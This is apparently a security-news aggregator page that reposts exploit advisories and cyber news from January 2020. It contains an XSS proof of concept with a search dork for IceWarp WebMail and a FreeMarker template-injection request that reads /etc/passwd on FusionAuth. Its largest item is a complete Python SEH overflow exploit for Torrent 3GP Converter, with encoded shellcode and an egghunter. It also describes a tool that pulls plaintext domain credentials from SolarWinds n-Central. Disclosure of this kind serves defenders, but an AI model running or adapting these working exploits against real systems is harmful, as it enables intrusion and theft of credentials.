An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

IceWarp WebMail versions 11.4.4.1 and below suffer from a cross site scripting vulnerability.

MD5 | d91c809ee4cd7fbde653e90bfaf0c0ee

[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability
[+] Date: 2020/01/27
[+] Author: Lutfu Mert Ceylan
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.4.1 and before
[+] Vulnerable Parameter: "color" (Get Method)
[+] Vulnerable File: /webmail/
[+} Dork : inurl:/webmail/ intext:Powered by IceWarp Server

# Notes:

An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and before)to send a malicious script to an unsuspecting Admins or users. The end admins or useras browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Even an attacker can easily place users in social engineering through this vulnerability and create a fake field.

# PoC:

[+] Go to Sign-in page through this path: http://localhost/webmail/
or
http://localhost:32000/webmail/

[+] Add the "color" parameter to the URL and write malicious code, Example: http://localhost/webmail/?color=">

[+] When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?color="> (Payload: ">)

# Demo Pictures:

[+] https://i.hizliresim.com/yGY6Zj.png

Source

FusionAuth versions 1.10 and below suffer from a remote command execution vulnerability. An authenticated attacker with enough privileges to access the template editing functions (either site templates or e-mail templates) in the FusionAuth dashboard can execute commands on the underlying operating system using the Apache FreeMarker Expression language.

MD5 | c1546986008443760e7e1b822230f95e

@Mediaservice.net Security Advisory #2020-03 (last updated on 2020-01-27)

Title: FusionAuth command execution via Apache Freemarker Template
Application: FusionAuth 1.10 and lower
Platforms: Tested on Windows 10 and Ubuntu 19.10
Description: An authenticated attacker with enough privileges to access the
template editing functions (either site templates or e-mail
templates) in the FusionAuth dashboard can execute commands on
the underlying operating system using the Apache FreeMarker
Expression language.
Author: Gianluca Baldi
Vendor Status: https://fusionauth.io/contact - notified on 2019-10-24
CVE Name: CVE-2020-7799
References: https://lab.mediaservice.net/advisory/2020-03-fusionauth.txt
https://fusionauth.io/
https://freemarker.apache.org/
https://www.mediaservice.net/

1. Abstract.

FusionAuth is a modern Access Management open source application, that can be
integrated with multiple technologies and platforms. FusionAuth can be
configured and customized in many ways from the administration dashboard and to
do so privileged acounts can modify templates.

FusionAuth Templates are in fact Apache Freemarker Templates, that are
interpreted by the Apache Freemarker Templates Engine. Since it is possible to
execute system commands using the Apache Freemarker Expression language,
template editing features can be abused to execute remote commands effectively,
using the "freemarker.template.utility.Execute" object.

2. Affected Platforms.

This vulnerability is platform-independent.

3. Fix.

This vulnerability has been fixed in version 1.11 of FusionAuth.

4. Proof of Concept.

Example POST request (Home -> Settings -> Email Templates -> Preview):

POST /ajax/email/template/preview HTTP/1.1
Host: 192.168.0.3:9011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 796
DNT: 1
Connection: close
Referer: http://192.168.0.3:9011/admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807;

primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}

5. Disclosure Timeline

2019-10-23 - First contact (issue in FusionAuth 1.9.1).
2019-10-24 - First PoC sent to the vendor.
2019-10-25 - Vendor investigates the issue.
2019-10-28 - Issue is confirmed and a disclosure date is agreed upon (2020-01-23).
2019-10-29 - Vendor silently releases a fixed version (FusionAauth 1.11.0).
2020-01-20 - Asked for updates on issue.
2020-01-20 - Vendor states that the issue has been fixed already.
2020-01-22 - Assigned CVE-2020-7799.
2019-02-27 - Advisory published.

Copyright (c) 2020 Gianluca Baldi and @Mediaservice.net. All rights reserved.

Source

This application, known as the SolarWinds n-Central Dumpster Diver, utilizes the nCentral agent dot net libraries to simulate the agent registration and pull the agent/appliance configuration settings. This information can contain plain text active directory domain credentials. This was reported to SolarWinds PSIRT(psirt@solarwinds.com) on 10/10/2019. In most cases the agent download URL is not secured allowing anyone without authorization and known customer id to download the agent software. Once you have a customer id you can self register and pull the config. Application will test availability of customer id via agent download URL. If successful it will then pull the config. We do not attempt to just pull the config because timing out on the operation takes to long. Removing the initial check, could produce more results as the agent download could be being blocked where as agent communication would not be. Harmony is only used to block the nCentral libraries from saving and creating a config directory that is not needed.

MD5 | 327907230e1957acb4b9383e511c3db6

Source

Torrent 3GP Converter version 1.51 suffers from a stack overflow vulnerability.

MD5 | 7fea22feb98c7bd2b313292c883dceea

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
# 2) run python script & open created 'crash.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars
# x00 => x20 # x0d Truncates buffer # x2d Gets ejected from buffer
# x61-x6f => x41-x4f / ASCII Lower => ASCII Upper
# x70-x7a => x50-x5a / ASCII Lower => ASCII Upper
# x9a => x8a # x9c => x8c # x9e => x8e
# xe0-xef => xc0-xcf # xf0-xf6 => xd0-xd6
# xf8-xfe => xd8-xde # xff => x9f
# badChars='x00x0dx2dx61x62x6364x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax9ax9cx9exe0xe1xe2xe3xe4xe5xe6xeexe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf8xf9xfaxfbxfcxfdxfexff'
# Max shellcode size is 2384 bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
# [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# 89E5 mov ebp, esp
shellcode = b'x54x5D' # push esp # pop ebp
# DBCD fcmovne st, st(5)
shellcode += b'x89xCF' # mov edi, ecx
# D975 F4 fstenv [ebp-C]
shellcode += b'x47x47x90' # inc edi # inc edi # nop
# 5F pop edi
shellcode += b'x90' # nop
shellcode += b"x57x59x49"
shellcode += b"x49x49x49x43x43x43x43x43x43x51x5a"
shellcode += b"x56x54x58x33x30x56x58x34x41x50x30"
shellcode += b"x41x33x48x48x30x41x30x30x41x42x41"
shellcode += b"x41x42x54x41x41x51x32x41x42x32x42"
shellcode += b"x42x30x42x42x58x50x38x41x43x4ax4a"
shellcode += b"x49x4bx4cx5ax48x4dx52x55x50x55x50"
shellcode += b"x33x30x43x50x4bx39x4bx55x46x51x59"
shellcode += b"x50x42x44x4cx4bx30x50x36x50x4cx4b"
shellcode += b"x56x32x34x4cx4cx4bx56x32x42x34x4c"
shellcode += b"x4bx34x32x31x38x34x4fx4ex57x50x4a"
shellcode += b"x37x56x30x31x4bx4fx4ex4cx47x4cx35"
shellcode += b"x31x43x4cx34x42x56x4cx47x50x39x51"
shellcode += b"x58x4fx34x4dx45x51x59x57x4ax42x4a"
shellcode += b"x52x46x32x56x37x4cx4bx31x42x44x50"
shellcode += b"x4cx4bx50x4ax47x4cx4cx4bx50x4cx42"
shellcode += b"x31x33x48x4bx53x51x58x45x51x4ex31"
shellcode += b"x30x51x4cx4bx31x49x51x30x55x51x59"
shellcode += b"x43x4cx4bx30x49x42x38x4bx53x37x4a"
shellcode += b"x57x39x4cx4bx47x44x4cx4bx53x31x59"
shellcode += b"x46x46x51x4bx4fx4ex4cx39x51x38x4f"
shellcode += b"x34x4dx35x51x4fx37x57x48x4dx30x53"
shellcode += b"x45x4cx36x45x53x53x4dx4ax58x37x4b"
shellcode += b"x43x4dx46x44x33x45x4ax44x56x38x4c"
shellcode += b"x4bx36x38x47x54x45x51x38x53x32x46"
shellcode += b"x4cx4bx44x4cx30x4bx4cx4bx50x58x45"
shellcode += b"x4cx53x31x59x43x4cx4bx45x54x4cx4b"
shellcode += b"x33x31x38x50x4dx59x57x34x57x54x36"
shellcode += b"x44x31x4bx51x4bx33x51x36x39x31x4a"
shellcode += b"x50x51x4bx4fx4dx30x51x4fx31x4fx50"
shellcode += b"x5ax4cx4bx45x42x5ax4bx4cx4dx51x4d"
shellcode += b"x52x4ax35x51x4cx4dx4cx45x48x32x35"
shellcode += b"x50x43x30x33x30x46x30x43x58x46x51"
shellcode += b"x4cx4bx42x4fx4dx57x4bx4fx59x45x4f"
shellcode += b"x4bx5ax50x38x35x39x32x31x46x53x58"
shellcode += b"x4ex46x5ax35x4fx4dx4dx4dx4bx4fx58"
shellcode += b"x55x47x4cx35x56x43x4cx35x5ax4bx30"
shellcode += b"x4bx4bx4dx30x42x55x44x45x4fx4bx37"
shellcode += b"x37x45x43x54x32x32x4fx42x4ax55x50"
shellcode += b"x36x33x4bx4fx58x55x45x33x55x31x32"
shellcode += b"x4cx43x53x35x50x41x41"
# Stack EggHunter for fun & profit
egg = 'BOKU'
hunterOS = 'x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter = 'x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter += 'x5B' # pop ebx / EBX=PC
hunter += 'x80x43x29x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter += 'x80x43x33x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter += 'xB8x42x4Fx4Bx55' # mov eax,0x424f4b55
hunter += 'x54' # push esp
hunter += 'x59' # pop ecx
hunter += 'x90'*18 # nop fillers for jnz short -7 loop
hunter += 'x49' # dec ecx
hunter += 'x3Bx01' # cmp eax, [ecx]
hunter += 'x55xF7' # 75F7 = jnz short -7 / Have to avoid bad xF- chars
hunter += 'x51' # push ecx
hunter += 'x5a' # pop edx
hunter += 'x4a'*4 # dec edx * 4 / check if second egg matchs
hunter += 'x3Bx02' # cmp eax, [edx]
hunter += 'x55xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter += 'x83xc14' # add ecx, 0x4 / start of shellcode after eggs
hunter += 'x31xd2' # xor edx,edx
hunter += 'x52' # push edx
hunter += 'xC6x44x24x02x4B' # mov byte [esp+0x2],0x4b
hunter += 'xC6x44x24x01x44' # mov byte [esp+0x1],0x44
hunter += 'xC6x04x24x39' # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:Program FilesTorrent 3GP Converterbsvideoconverter.exe)
hunter += 'xc3' # ret
huntRmdr = 'x41'*(88-len(hunter))
nsehOS = 'x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH = 'x83xC4x04xC3' # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH = 'x0fx47x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}

payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
f=open("crash.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

Source

image
Both the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions. Browser extensions are add-ons that users can install to enhance their web surfing experience – they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning. While extensions are useful, they can also introduce danger. In addition to intentionally malicious browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who look to exploit vulnerabilities in their code. Google Bans Paid Extensions In this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component – those that are paid for, offer in-browser transactions and those that offer subscription services. It’s a temporary measure, according to the internet giant – but one that doesn’t yet have a timeline for resolution. “Earlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,” it said in a notice, issued Friday. “Due to the scale of this abuse, we have temporarily disabled publishing paid items….

Source

image
A mid-January spam campaign by criminals behind the popular Necurs botnet shows a dramatic drop in skill and savvy by perpetrators. In a shift from sending sophisticated messages with lethal payloads, Necurs botnets are now peddling get-rich-quick spam within what researchers are calling “amateur” campaigns. The lowering of the Necurs bar, according to IBM X-Force researchers, is tied to the fact cybergangs are attempting to up their game and adopt new and more sophisticated attacks that are harder to defend against and spending less time cooking up deadly Necurs-based spam attacks. Necurs, a prolific and globally dispersed spam and malware distribution botnet, has long been a formidable threat since it was first spotted in 2012. The botnet’s popularity stems from its ability to sneak past spam filters, resulting in high infection rates for its cybercrime clientele and the spreading of malware GameOver Zeus, Dridex,Loki and TrickBot. However, researchers say that a desire for more targeted attacks and a stronger foothold in networks has forced adversaries over the past year to turn away from Necurs in favor of alternative malware. Most notably, cybercrime groups are now eyeing Emotet as a preferred means of attack over Necurs. Emotet started out as a banking trojan but eventually evolved into a botnet used to distribute malware in enterprise attacks. “Things are changing and with major banking Trojan botnets moving away from Necurs and to distribution through inter-gang…

Source

image
Aleksei Burkov, an ultra-connected Russian hacker once described as "an asset of supreme importance" to Moscow, has pleaded guilty in a U.S. court to running a site that sold stolen payment card data and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks. Aleksei Burkov, seated second from right, attends a hearing in Jerusalem in 2015. Andrei Shirokov / Tass via Getty Images. Burkov, 29, admitted to running CardPlanet, a site that sold more than 150,000 stolen credit card accounts, and to being the founder and administrator of DirectConnection — a closely guarded underground community that attracted some of the world's most-wanted Russian hackers. He pleaded guilty last week in a Virginia court to access device fraud and conspiracy to commit computer intrusion, identity theft, wire fraud and money laundering. As KrebsOnSecurity noted in a November 2019 profile of Burkov's hacker nickname ‘k0pa,' "a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled malicious hackers ever apprehended by U.S. authorities, and that the Russian government is probably concerned that he simply knows too much." Membership in the DirectConnection fraud forum was heavily restricted. New members had to be native Russian speakers, provide a $5,000 deposit, and be vouched for by three existing crime forum members. Also, members needed to have a…

Source

image
New York State may soon ban municipalities from paying ransomware demands in the event of a cyberattack. State Senators Phil Boyle, George M. Borrello and Sue Serino introduced Senate Bill S7246 earlier this month, in response to the rising tide of cyberattacks targeting government agencies and municipal entities across the country. Some of these – such as Riviera Beach and Lake City in Florida – have paid the ransom, after remediation was deemed to be more expensive than shelling out to the hackers. Others, such as New Bedford, Mass., and the city of Atlanta, have ridden out the infection without paying up. In the latter case, the city ended up spending $2.6 million to recover, with expenditures for incident response and digital forensics, additional staffing and Microsoft Cloud infrastructure expertise. Though cybersecurity experts have noted that the decision to pay or not to pay is a complex one, dictated by individual circumstances, budget and risk to data. The bill, S.B. S7246, proposes a blanket policy in New York State that’s aimed at removing the incentive for ransomware operators to keep targeting its agencies, towns and cities. To accommodate the expected remediation costs, the bill proposes the creation of a “Cyber Security Enhancement Fund.” This would be earmarked for municipalities with populations of less than a million residents to upgrade their security postures. “A small investment in local government cybersecurity now, can help stop cybercriminals from…

Source

meshsystem.dll in Valve Dota 2 before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a vulnerable function call.

Source